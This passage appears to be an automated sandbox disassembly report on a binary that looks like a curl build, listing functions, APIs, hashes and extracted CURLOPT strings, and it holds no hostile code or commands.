Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF7F1DDF2D0

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 48a1125f6749bdc14625ada9a6c1b331a8951bbbc20a73abeb2e479d87fe1efa
Instruction ID: 792e7844bdef6fd4e6b96941c152364eabf7ae87a2810028f7c44d8b81e3ad5e
Opcode Fuzzy Hash: 48a1125f6749bdc14625ada9a6c1b331a8951bbbc20a73abeb2e479d87fe1efa
Instruction Fuzzy Hash: 93D0C955E1FA0292FB0CBB81A885370A7606F54707FD90634C02E141E0CFEC60A5C3A0

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FF7F1D9DEA0 Relevance: 99.8, APIs: 1, Strings: 65, Instructions: 812COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7F1DA1E80: __swprintf_l.LIBCMT ref: 00007FF7F1DA1F37
Part of subcall function 00007FF7F1DA1E80: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00007FF7F1D9F1CE,?,?,?,?,?,00000000,00000000,00007FF7F1D9F585,?,00000001,?,00000000,00000000), ref: 00007FF7F1DA20BD

Part of subcall function 00007FF7F1DA1E80: __swprintf_l.LIBCMT ref: 00007FF7F1DA1FDD

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9EC4A

Strings

CURLOPT_SASL_AUTHZID, xrefs: 00007FF7F1D9E910
CURLOPT_LOCALPORT, xrefs: 00007FF7F1D9E301
CURLOPT_UNIX_SOCKET_PATH, xrefs: 00007FF7F1D9EA0F
CURLOPT_SOCKS5_GSSAPI_NEC, xrefs: 00007FF7F1D9E167
CURLOPT_DISALLOW_USERNAME_IN_URL, xrefs: 00007FF7F1D9EB49
CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS, xrefs: 00007FF7F1D9EAE4
CURLOPT_SSL_ENABLE_ALPN, xrefs: 00007FF7F1D9E9AA
CURLOPT_SSL_SESSIONID_CACHE, xrefs: 00007FF7F1D9E390
CURLOPT_PROXY_TLS13_CIPHERS, xrefs: 00007FF7F1D9DEE3
CURLOPT_TCP_KEEPINTVL, xrefs: 00007FF7F1D9E48B
CURLOPT_HEADERDATA, xrefs: 00007FF7F1D9E6A7
CURLOPT_SSL_ENABLE_NPN, xrefs: 00007FF7F1D9E976
CURLOPT_MAIL_RCPT_ALLLOWFAILS, xrefs: 00007FF7F1D9E55D
CURLOPT_DEBUGDATA, xrefs: 00007FF7F1D9DF9D
CURLOPT_RESOLVE, xrefs: 00007FF7F1D9E6EC
CURLOPT_TLSAUTH_TYPE, xrefs: 00007FF7F1D9E7C3
CURLOPT_TFTP_NO_OPTIONS, xrefs: 00007FF7F1D9EAAA
CURLOPT_NEW_FILE_PERMS, xrefs: 00007FF7F1D9E5B6
CURLOPT_HEADERFUNCTION, xrefs: 00007FF7F1D9E68B
CURLOPT_FTP_USE_EPRT, xrefs: 00007FF7F1D9DF3F
CURLOPT_FTP_ALTERNATIVE_TO_USER, xrefs: 00007FF7F1D9E363
CURLOPT_FTP_USE_PRET, xrefs: 00007FF7F1D9E581
CURLOPT_HTTP_TRANSFER_DECODING, xrefs: 00007FF7F1D9E3E6
CURLOPT_LOCALPORTRANGE, xrefs: 00007FF7F1D9E332
CURLOPT_FTP_SSL_CCC, xrefs: 00007FF7F1D9E12E
CURLOPT_ABSTRACT_UNIX_SOCKET, xrefs: 00007FF7F1D9E9FE
CURLOPT_DEFAULT_PROTOCOL, xrefs: 00007FF7F1D9EA33
CURLOPT_EXPECT_100_TIMEOUT_MS, xrefs: 00007FF7F1D9EA81
CURLOPT_PROXY_SERVICE_NAME, xrefs: 00007FF7F1D9E1CF
CURLOPT_GSSAPI_DELEGATION, xrefs: 00007FF7F1D9E8A0
CURLOPT_HTTP_CONTENT_DECODING, xrefs: 00007FF7F1D9E3C2
CURLOPT_TLSAUTH_USERNAME, xrefs: 00007FF7F1D9E753
CURLOPT_CONNECT_TO, xrefs: 00007FF7F1D9E717
CURLOPT_TFTP_BLKSIZE, xrefs: 00007FF7F1D9E4C1
CURLOPT_FTP_ACCOUNT, xrefs: 00007FF7F1D9E239
CURLOPT_TCP_KEEPIDLE, xrefs: 00007FF7F1D9E452
CURLOPT_SASL_IR, xrefs: 00007FF7F1D9E942
CURLOPT_USE_SSL, xrefs: 00007FF7F1D9E108
CURLOPT_ALTSVC, xrefs: 00007FF7F1D9EB80
CURLOPT_TLS13_CIPHERS, xrefs: 00007FF7F1D9DEAD
CURLOPT_HSTS, xrefs: 00007FF7F1D9EBB5
CURLOPT_PROXY_TLSAUTH_PASSWORD, xrefs: 00007FF7F1D9E833
CURLOPT_REDIR_PROTOCOLS, xrefs: 00007FF7F1D9E605
CURLOPT_DEBUGFUNCTION, xrefs: 00007FF7F1D9DF7F
CURLOPT_MAIL_AUTH, xrefs: 00007FF7F1D9E8D8
CURLOPT_SERVICE_NAME, xrefs: 00007FF7F1D9E205
CURLOPT_TLSAUTH_PASSWORD, xrefs: 00007FF7F1D9E78B
CURLOPT_FTP_SKIP_PASV_IP, xrefs: 00007FF7F1D9E2A9
CURLOPT_PROXY_TLSAUTH_USERNAME, xrefs: 00007FF7F1D9E7FB
CURLOPT_SSLENGINE, xrefs: 00007FF7F1D9E003
CURLOPT_PROXY_TLSAUTH_TYPE, xrefs: 00007FF7F1D9E86B
CURLOPT_FTP_CREATE_MISSING_DIRS, xrefs: 00007FF7F1D9E03D
CURLOPT_VERBOSE, xrefs: 00007FF7F1D9DFC6
<(, xrefs: 00007FF7F1D9EBBC
CURLOPT_MAXFILESIZE_LARGE, xrefs: 00007FF7F1D9E078
CURLOPT_MAIL_FROM, xrefs: 00007FF7F1D9E4F6
CURLOPT_IGNORE_CONTENT_LENGTH, xrefs: 00007FF7F1D9E274
CURLOPT_TCP_KEEPALIVE, xrefs: 00007FF7F1D9E411
CURLOPT_PROTOCOLS, xrefs: 00007FF7F1D9E5E0
CURLOPT_SOCKS5_AUTH, xrefs: 00007FF7F1D9E197
CURLOPT_FTP_FILEMETHOD, xrefs: 00007FF7F1D9E2D2
CURLOPT_MAIL_RCPT, xrefs: 00007FF7F1D9E52F
CURLOPT_HAPROXYPROTOCOL, xrefs: 00007FF7F1D9EB15
CURLOPT_FTP_USE_EPSV, xrefs: 00007FF7F1D9DF10
CURLOPT_IPRESOLVE, xrefs: 00007FF7F1D9E0A9

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_lfree
String ID: <($CURLOPT_ABSTRACT_UNIX_SOCKET$CURLOPT_ALTSVC$CURLOPT_CONNECT_TO$CURLOPT_DEBUGDATA$CURLOPT_DEBUGFUNCTION$CURLOPT_DEFAULT_PROTOCOL$CURLOPT_DISALLOW_USERNAME_IN_URL$CURLOPT_EXPECT_100_TIMEOUT_MS$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_CREATE_MISSING_DIRS$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_FTP_USE_EPRT$CURLOPT_FTP_USE_EPSV$CURLOPT_FTP_USE_PRET$CURLOPT_GSSAPI_DELEGATION$CURLOPT_HAPPY_EYEBALLS_TIMEOUT_MS$CURLOPT_HAPROXYPROTOCOL$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HSTS$CURLOPT_HTTP_CONTENT_DECODING$CURLOPT_HTTP_TRANSFER_DECODING$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_IPRESOLVE$CURLOPT_LOCALPORT$CURLOPT_LOCALPORTRANGE$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_MAIL_RCPT_ALLLOWFAILS$CURLOPT_MAXFILESIZE_LARGE$CURLOPT_NEW_FILE_PERMS$CURLOPT_PROTOCOLS$CURLOPT_PROXY_SERVICE_NAME$CURLOPT_PROXY_TLS13_CIPHERS$CURLOPT_PROXY_TLSAUTH_PASSWORD$CURLOPT_PROXY_TLSAUTH_TYPE$CURLOPT_PROXY_TLSAUTH_USERNAME$CURLOPT_REDIR_PROTOCOLS$CURLOPT_RESOLVE$CURLOPT_SASL_AUTHZID$CURLOPT_SASL_IR$CURLOPT_SERVICE_NAME$CURLOPT_SOCKS5_AUTH$CURLOPT_SOCKS5_GSSAPI_NEC$CURLOPT_SSLENGINE$CURLOPT_SSL_ENABLE_ALPN$CURLOPT_SSL_ENABLE_NPN$CURLOPT_SSL_SESSIONID_CACHE$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_KEEPIDLE$CURLOPT_TCP_KEEPINTVL$CURLOPT_TFTP_BLKSIZE$CURLOPT_TFTP_NO_OPTIONS$CURLOPT_TLS13_CIPHERS$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_UNIX_SOCKET_PATH$CURLOPT_USE_SSL$CURLOPT_VERBOSE
API String ID: 399239331-57453129
Opcode ID: 467492ba8c959cabc1a8f4f2d6133e089b2ea84b010a5b04c9ad920188eb27f7
Instruction ID: 3486af91892d70f5cbbf98d646078a7eacacb5ed5b700ebd402fe463de581141
Opcode Fuzzy Hash: 467492ba8c959cabc1a8f4f2d6133e089b2ea84b010a5b04c9ad920188eb27f7
Instruction Fuzzy Hash: F882A37160978286E764EB11E4805AAF7F8FB887C4F844235EAAC537A5DF7CE224C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9BB5B Relevance: 98.5, APIs: 19, Strings: 37, Instructions: 544stringCOMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D9BB8C
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9BDEB
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9BDF4
_setmode.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9BE00
ioctlsocket.WS2_32 ref: 00007FF7F1D9BE30
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D9BE3D
strerror.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D9BE45
_fileno.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9BEE3
_isatty.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D9BEEA

Strings

', xrefs: 00007FF7F1D9C3C6
+, xrefs: 00007FF7F1D9C367
https://, xrefs: 00007FF7F1D9BEC7
CURLOPT_TCP_FASTOPEN, xrefs: 00007FF7F1D9C173
Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!, xrefs: 00007FF7F1D9BDDA
CURLOPT_SEEKDATA, xrefs: 00007FF7F1D9C27D
"], xrefs: 00007FF7F1D9C159
proxy support is disabled in this libcurl, xrefs: 00007FF7F1D9C41F
CURLOPT_SEEKFUNCTION, xrefs: 00007FF7F1D9C2B8
CURLOPT_INTERLEAVEDATA, xrefs: 00007FF7F1D9C1C0
\, xrefs: 00007FF7F1D9C192
CURLOPT_WRITEFUNCTION, xrefs: 00007FF7F1D9C1FB
CURLOPT_TCP_NODELAY, xrefs: 00007FF7F1D9C13A
Can't open '%s'!, xrefs: 00007FF7F1D9BD0B
CURLOPT_PROXY, xrefs: 00007FF7F1D9C3F3
CURLOPT_WRITEDATA, xrefs: 00007FF7F1D9C19C
%s%c%s, xrefs: 00007FF7F1D9BF86
,N, xrefs: 00007FF7F1D9C266
CURLOPT_BUFFERSIZE, xrefs: 00007FF7F1D9C2F7
bad output glob!, xrefs: 00007FF7F1D9BB9D
http://, xrefs: 00007FF7F1D9BEA6
CURLOPT_URL, xrefs: 00007FF7F1D9C325
g\, xrefs: 00007FF7F1D9C214
output glob produces empty string!, xrefs: 00007FF7F1D9BC54
<[, xrefs: 00007FF7F1D9C33F
3\, xrefs: 00007FF7F1D9C248
CURLOPT_READDATA, xrefs: 00007FF7F1D9C228
CURLOPT_NOBODY, xrefs: 00007FF7F1D9C387
nZ, xrefs: 00007FF7F1D9C40D
CURLOPT_XOAUTH2_BEARER, xrefs: 00007FF7F1D9C3BF
://, xrefs: 00007FF7F1D9BF24
CURLOPT_READFUNCTION, xrefs: 00007FF7F1D9C25F
%s/%s, xrefs: 00007FF7F1D9BC7C
j[, xrefs: 00007FF7F1D9C311
I;, xrefs: 00007FF7F1D9BE6A
fcntl failed on fd=%d: %s, xrefs: 00007FF7F1D9BE4F
CURLOPT_NOPROGRESS, xrefs: 00007FF7F1D9C360

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _fileno$__acrt_iob_func_errno_isatty_setmodefreeioctlsocketstrerror
String ID: %s%c%s$%s/%s$+$,N$://$CURLOPT_BUFFERSIZE$CURLOPT_INTERLEAVEDATA$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_PROXY$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_TCP_FASTOPEN$CURLOPT_TCP_NODELAY$CURLOPT_URL$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XOAUTH2_BEARER$Can't open '%s'!$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$bad output glob!$fcntl failed on fd=%d: %s$http://$https://$output glob produces empty string!$proxy support is disabled in this libcurl$"]$'$3\$<[$I;$g\$j[$nZ$\
API String ID: 3924750426-4013526855
Opcode ID: dff0a90e56affe60765fbc2c71b9d7dc1728afcdce615f3453fdb8d0977f7058
Instruction ID: cf1cbd94314c12a987cbd3d005cd0b1ad5eccbdf23038a162f55c00ee6713e5f
Opcode Fuzzy Hash: dff0a90e56affe60765fbc2c71b9d7dc1728afcdce615f3453fdb8d0977f7058
Instruction Fuzzy Hash: 3532F022A0E78682FB64EB21A4446B9A7B4FF89784FC54135DA6D077D5DFBCE500C3A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9C55E Relevance: 57.9, Strings: 46, Instructions: 403COMMON

Download Yara Rule

Strings

CURLOPT_USERPWD, xrefs: 00007FF7F1D9C810
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00007FF7F1D9CB3E
CURLOPT_POSTFIELDS, xrefs: 00007FF7F1D9C8F5
aT, xrefs: 00007FF7F1D9CA1A
CURLOPT_NOPROXY, xrefs: 00007FF7F1D9C5A5
CURLOPT_UPLOAD, xrefs: 00007FF7F1D9C67B
CURLOPT_ERRORBUFFER, xrefs: 00007FF7F1D9C872
CURLOPT_TRANSFERTEXT, xrefs: 00007FF7F1D9C7AF
CURLOPT_PROXYAUTH, xrefs: 00007FF7F1D9C581
tR, xrefs: 00007FF7F1D9CC07
CURLOPT_USERAGENT, xrefs: 00007FF7F1D9CABF
CURLOPT_LOGIN_OPTIONS, xrefs: 00007FF7F1D9C7DC
CURLOPT_REFERER, xrefs: 00007FF7F1D9CA91
CURLOPT_TIMEOUT_MS, xrefs: 00007FF7F1D9C8B7
CURLOPT_FAILONERROR, xrefs: 00007FF7F1D9C61C
CURLOPT_APPEND, xrefs: 00007FF7F1D9C6E5
CURLOPT_FOLLOWLOCATION, xrefs: 00007FF7F1D9CB09
CURLOPT_HTTP_VERSION, xrefs: 00007FF7F1D9CC41
CURLOPT_MIME_OPTIONS, xrefs: 00007FF7F1D9C9FE
5, xrefs: 00007FF7F1D9C7B6
D, xrefs: 00007FF7F1D9CBF5
CURLOPT_HTTP09_ALLOWED, xrefs: 00007FF7F1D9CD2D
CURLOPT_MAXREDIRS, xrefs: 00007FF7F1D9CBEE
CURLOPT_RANGE, xrefs: 00007FF7F1D9C841
CURLOPT_REQUEST_TARGET, xrefs: 00007FF7F1D9C641
CURLOPT_POSTREDIR, xrefs: 00007FF7F1D9CC92
CURLOPT_TRANSFER_ENCODING, xrefs: 00007FF7F1D9CCED
CURLOPT_SUPPRESS_CONNECT_HEADERS, xrefs: 00007FF7F1D9C5E0
CURLOPT_AUTOREFERER, xrefs: 00007FF7F1D9CB73
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00007FF7F1D9C926
V, xrefs: 00007FF7F1D9C85B
CURLOPT_HEADEROPT, xrefs: 00007FF7F1D9CBB5
"', xrefs: 00007FF7F1D9CAC6
CURLOPT_DIRLISTONLY, xrefs: 00007FF7F1D9C6B0
CURLOPT_NETRC, xrefs: 00007FF7F1D9C746
CURLOPT_PROXYHEADER, xrefs: 00007FF7F1D9CBA3
CURLOPT_ACCEPT_ENCODING, xrefs: 00007FF7F1D9CCC3
CURLOPT_NETRC_FILE, xrefs: 00007FF7F1D9C771
v', xrefs: 00007FF7F1D9CCCA
!X, xrefs: 00007FF7F1D9C65A
QV, xrefs: 00007FF7F1D9C82A
V, xrefs: 00007FF7F1D9C78E
M, xrefs: 00007FF7F1D9C758
CURLOPT_HTTPHEADER, xrefs: 00007FF7F1D9CA55
CURLOPT_HTTPAUTH, xrefs: 00007FF7F1D9CA2A
HTTP/0.9 is not supported in this build!, xrefs: 00007FF7F1D9CD4C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$free
String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
API String ID: 1144208884-223163314
Opcode ID: 872343d23281035c79468e3a4c0806f807a27192c4dd38ef4a8c741f7050dd3b
Instruction ID: 21ce2aab6a6a8d356c5feb3693e62d142846337560c4818270a2ccd1c7f4d274
Opcode Fuzzy Hash: 872343d23281035c79468e3a4c0806f807a27192c4dd38ef4a8c741f7050dd3b
Instruction Fuzzy Hash: 2602E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9C538 Relevance: 57.9, Strings: 46, Instructions: 403COMMON

Download Yara Rule

Strings

CURLOPT_USERPWD, xrefs: 00007FF7F1D9C810
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00007FF7F1D9CB3E
CURLOPT_POSTFIELDS, xrefs: 00007FF7F1D9C8F5
aT, xrefs: 00007FF7F1D9CA1A
CURLOPT_NOPROXY, xrefs: 00007FF7F1D9C5A5
CURLOPT_UPLOAD, xrefs: 00007FF7F1D9C67B
CURLOPT_ERRORBUFFER, xrefs: 00007FF7F1D9C872
CURLOPT_TRANSFERTEXT, xrefs: 00007FF7F1D9C7AF
CURLOPT_PROXYAUTH, xrefs: 00007FF7F1D9C581
tR, xrefs: 00007FF7F1D9CC07
CURLOPT_USERAGENT, xrefs: 00007FF7F1D9CABF
CURLOPT_LOGIN_OPTIONS, xrefs: 00007FF7F1D9C7DC
CURLOPT_REFERER, xrefs: 00007FF7F1D9CA91
CURLOPT_TIMEOUT_MS, xrefs: 00007FF7F1D9C8B7
CURLOPT_FAILONERROR, xrefs: 00007FF7F1D9C61C
CURLOPT_APPEND, xrefs: 00007FF7F1D9C6E5
CURLOPT_FOLLOWLOCATION, xrefs: 00007FF7F1D9CB09
CURLOPT_HTTP_VERSION, xrefs: 00007FF7F1D9CC41
CURLOPT_MIME_OPTIONS, xrefs: 00007FF7F1D9C9FE
5, xrefs: 00007FF7F1D9C7B6
D, xrefs: 00007FF7F1D9CBF5
CURLOPT_HTTP09_ALLOWED, xrefs: 00007FF7F1D9CD2D
CURLOPT_MAXREDIRS, xrefs: 00007FF7F1D9CBEE
CURLOPT_RANGE, xrefs: 00007FF7F1D9C841
CURLOPT_REQUEST_TARGET, xrefs: 00007FF7F1D9C641
CURLOPT_POSTREDIR, xrefs: 00007FF7F1D9CC92
CURLOPT_TRANSFER_ENCODING, xrefs: 00007FF7F1D9CCED
CURLOPT_SUPPRESS_CONNECT_HEADERS, xrefs: 00007FF7F1D9C5E0
CURLOPT_AUTOREFERER, xrefs: 00007FF7F1D9CB73
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00007FF7F1D9C926
V, xrefs: 00007FF7F1D9C85B
CURLOPT_HEADEROPT, xrefs: 00007FF7F1D9CBB5
"', xrefs: 00007FF7F1D9CAC6
CURLOPT_DIRLISTONLY, xrefs: 00007FF7F1D9C6B0
CURLOPT_NETRC, xrefs: 00007FF7F1D9C746
CURLOPT_PROXYHEADER, xrefs: 00007FF7F1D9CBA3
CURLOPT_ACCEPT_ENCODING, xrefs: 00007FF7F1D9CCC3
CURLOPT_NETRC_FILE, xrefs: 00007FF7F1D9C771
v', xrefs: 00007FF7F1D9CCCA
!X, xrefs: 00007FF7F1D9C65A
QV, xrefs: 00007FF7F1D9C82A
V, xrefs: 00007FF7F1D9C78E
M, xrefs: 00007FF7F1D9C758
CURLOPT_HTTPHEADER, xrefs: 00007FF7F1D9CA55
CURLOPT_HTTPAUTH, xrefs: 00007FF7F1D9CA2A
HTTP/0.9 is not supported in this build!, xrefs: 00007FF7F1D9CD4C

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$free
String ID: "'$5$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_DIRLISTONLY$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FOLLOWLOCATION$CURLOPT_HEADEROPT$CURLOPT_HTTP09_ALLOWED$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTP_VERSION$CURLOPT_LOGIN_OPTIONS$CURLOPT_MAXREDIRS$CURLOPT_MIME_OPTIONS$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTREDIR$CURLOPT_PROXYAUTH$CURLOPT_PROXYHEADER$CURLOPT_RANGE$CURLOPT_REFERER$CURLOPT_REQUEST_TARGET$CURLOPT_SUPPRESS_CONNECT_HEADERS$CURLOPT_TIMEOUT_MS$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_USERAGENT$CURLOPT_USERPWD$D$HTTP/0.9 is not supported in this build!$v'$ V$!X$QV$aT$tR$M$V
API String ID: 1144208884-223163314
Opcode ID: a1d5a9935ef0b0a00b65c9a83cfba9fffc0bc6a792ee380ff02ab6ef0c9c3870
Instruction ID: a7a9f7dbac33862076f3022ceb7fb47cb01a7772c043e8b328c8aa733ce9f702
Opcode Fuzzy Hash: a1d5a9935ef0b0a00b65c9a83cfba9fffc0bc6a792ee380ff02ab6ef0c9c3870
Instruction Fuzzy Hash: 6302E675A09B8286E724EB11E44019AF7B9FB887C4F844235EAAD43BA9DF7CD314C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D9C54B Relevance: 57.9, Strings: 46, Instructions: 403COMMON

Download Yara Rule

Strings

CURLOPT_USERPWD, xrefs: 00007FF7F1D9C810
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00007FF7F1D9CB3E
CURLOPT_POSTFIELDS, xrefs: 00007FF7F1D9C8F5
aT, xrefs: 00007FF7F1D9CA1A
CURLOPT_NOPROXY, xrefs: 00007FF7F1D9C5A5
CURLOPT_UPLOAD, xrefs: 00007FF7F1D9C67B
CURLOPT_ERRORBUFFER, xrefs: 00007FF7F1D9C872
CURLOPT_TRANSFERTEXT, xrefs: 00007FF7F1D9C7AF
CURLOPT_PROXYAUTH, xrefs: 00007FF7F1D9C581
tR, xrefs: 00007FF7F1D9CC07
CURLOPT_USERAGENT, xrefs: 00007FF7F1D9CABF
CURLOPT_LOGIN_OPTIONS, xrefs: 00007FF7F1D9C7DC
CURLOPT_REFERER, xrefs: 00007FF7F1D9CA91
CURLOPT_TIMEOUT_MS, xrefs: 00007FF7F1D9C8B7
CURLOPT_FAILONERROR, xrefs: 00007FF7F1D9C61C
CURLOPT_APPEND, xrefs: 00007FF7F1D9C6E5
CURLOPT_FOLLOWLOCATION, xrefs: 00007FF7F1D9CB09
CURLOPT_HTTP_VERSION, xrefs: 00007FF7F1D9CC41
CURLOPT_MIME_OPTIONS, xrefs: 00007FF7F1D9C9FE
5, xrefs: 00007FF7F1D9C7B6
D, xrefs: 00007FF7F1D9CBF5
CURLOPT_HTTP09_ALLOWED, xrefs: 00007FF7F1D9CD2D
CURLOPT_MAXREDIRS, xrefs: 00007FF7F1D9CBEE
CURLOPT_RANGE, xrefs: 00007FF7F1D9C841
CURLOPT_REQUEST_TARGET, xrefs: 00007FF7F1D9C641
CURLOPT_POSTREDIR, xrefs: 00007FF7F1D9CC92
CURLOPT_TRANSFER_ENCODING, xrefs: 00007FF7F1D9CCED
CURLOPT_SUPPRESS_CONNECT_HEADERS, xrefs: 00007FF7F1D9C5E0
CURLOPT_AUTOREFERER, xrefs: 00007FF7F1D9CB73
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00007FF7F1D9C926
V, xrefs: 00007FF7F1D9C85B
CURLOPT_HEADEROPT, xrefs: 00007FF7F1D9CBB5
